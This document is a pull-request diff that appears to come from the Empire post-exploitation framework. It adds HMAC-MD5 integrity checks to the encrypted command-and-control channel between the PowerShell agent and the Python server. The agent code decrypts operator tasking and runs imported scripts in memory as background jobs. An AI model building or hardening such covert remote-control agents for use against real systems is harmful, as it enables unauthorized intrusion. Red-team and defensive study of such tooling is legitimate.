Merge pull request #3 from joncave/authenticated_encryption

Update of encryption scheme uses to include integrity checking. Merge from joncave/authenticated_encryption

data/agent/agent.ps1

@@ -495,12 +495,25 @@ function Invoke-Empire {
         $AES.Mode = "CBC";
         $AES.Key = $encoding.GetBytes($SessionKey);
         $AES.IV = $IV;
-        $IV + ($AES.CreateEncryptor()).TransformFinalBlock($bytes, 0, $bytes.Length);
+        $ciphertext = $IV + ($AES.CreateEncryptor()).TransformFinalBlock($bytes, 0, $bytes.Length);
+        $hmac = New-Object System.Security.Cryptography.HMACMD5;
+        $hmac.Key = $encoding.GetBytes($SessionKey);
+        $ciphertext + $hmac.ComputeHash($ciphertext);
     } 
 
     function Decrypt-Bytes { 
         param ($inBytes)
-        if($inBytes.Length -gt 16){
+        if($inBytes.Length -gt 32){
+            # Verify the MAC
+            $mac = $inBytes[-16..-1];
+            $inBytes = $inBytes[0..($inBytes.length - 17)];
+            $hmac = New-Object System.Security.Cryptography.HMACMD5;
+            $hmac.Key = $encoding.GetBytes($SessionKey);
+            $expected = $hmac.ComputeHash($inBytes);
+            if (@(Compare-Object $mac $expected -sync 0).Length -ne 0){
+                return;
+            }
+
             # extract the IV
             $IV = $inBytes[0..15];
             $AES = New-Object System.Security.Cryptography.AesCryptoServiceProvider;
@@ -779,8 +792,11 @@ function Invoke-Empire {
             elseif($type -eq 121){
                 
                 # decrypt the script in memory and execute the code as a background job
-                $jobID = Start-AgentJob ([System.Text.Encoding]::UTF8.GetString( (Decrypt-Bytes $script:importedScript)) + "; $data")
-                Encode-Packet -type $type -data ("Job started: " + $jobID)
+                $script = Decrypt-Bytes $script:importedScript
+                if ($script){
+                    $jobID = Start-AgentJob ([System.Text.Encoding]::UTF8.GetString($script) + "; $data")
+                    Encode-Packet -type $type -data ("Job started: " + $jobID)
+                }
             }
 
             else{
@@ -798,6 +814,9 @@ function Invoke-Empire {
 
         # Decrypt the tasking and process it appropriately
         $taskingBytes = Decrypt-Bytes $tasking
+        if (!$taskingBytes){
+            return
+        }
 
         # decode the first packet
         $decoded = Decode-Packet $taskingBytes

lib/common/agents.py

@@ -1035,7 +1035,7 @@ class Agents:
                     sessionKey = self.agents[sessionID][0]
 
                     # encrypt the tasking packets with the agent's session key
-                    encryptedData = encryption.aes_encrypt(sessionKey, allTaskPackets)
+                    encryptedData = encryption.aes_encrypt_then_mac(sessionKey, allTaskPackets)
 
                     return (200, encryptedData)
 
@@ -1112,8 +1112,8 @@ class Agents:
                 sessionKey = self.agents[sessionID][0]
 
                 try:
-                    # decrypt and depad the packet
-                    packet = encryption.aes_decrypt(sessionKey, postData)
+                    # verify, decrypt and depad the packet
+                    packet = encryption.aes_decrypt_and_verify(sessionKey, postData)
 
                     # update the client's last seen time
                     self.update_agent_lastseen(sessionID)

lib/common/encryption.py

@@ -9,7 +9,7 @@ from Crypto.Cipher import AES
 from Crypto import Random
 from Crypto.Random import random
 from binascii import hexlify 
-import base64, string, M2Crypto
+import base64, hashlib, hmac, string, M2Crypto
 
 import helpers
 
@@ -71,6 +71,15 @@ def aes_encrypt(key, data):
     return IV + cipher.encrypt(pad(data))
 
 
+def aes_encrypt_then_mac(key, data):
+    """
+    Encrypt the data then calculate HMAC over the ciphertext.
+    """
+    data = aes_encrypt(key, data)
+    mac = hmac.new(str(key), data, hashlib.md5).digest()
+    return data + mac
+
+
 def aes_decrypt(key, data):
     """
     Generate an AES cipher object, pull out the IV from the data
@@ -82,6 +91,31 @@ def aes_decrypt(key, data):
         return depad(cipher.decrypt(data[16:]))
 
 
+def verify_hmac(key, data):
+    """
+    Verify the HMAC supplied in the data with the given key.
+    """
+    if len(data) > 16:
+        mac = data[-16:]
+        data = data[:-16]
+        expected = hmac.new(str(key), data, hashlib.md5).digest()
+        # Double HMAC to prevent timing attacks. hmac.compare_digest() is
+        # preferable, but only available since Python 2.7.7.
+        return hmac.new(str(key), expected).digest() == hmac.new(str(key), mac).digest()
+
+    return False
+
+
+def aes_decrypt_and_verify(key, data):
+    """
+    Decrypt the data, but only if it has a valid MAC.
+    """
+    if len(data) > 32 and verify_hmac(key, data):
+        return aes_decrypt(key, data[:-16])
+
+    raise Exception("Invalid ciphertext received.")
+
+
 def generate_aes_key():
     """
     Generate a random new 128-bit AES key using Pycrypto's secure Random functions.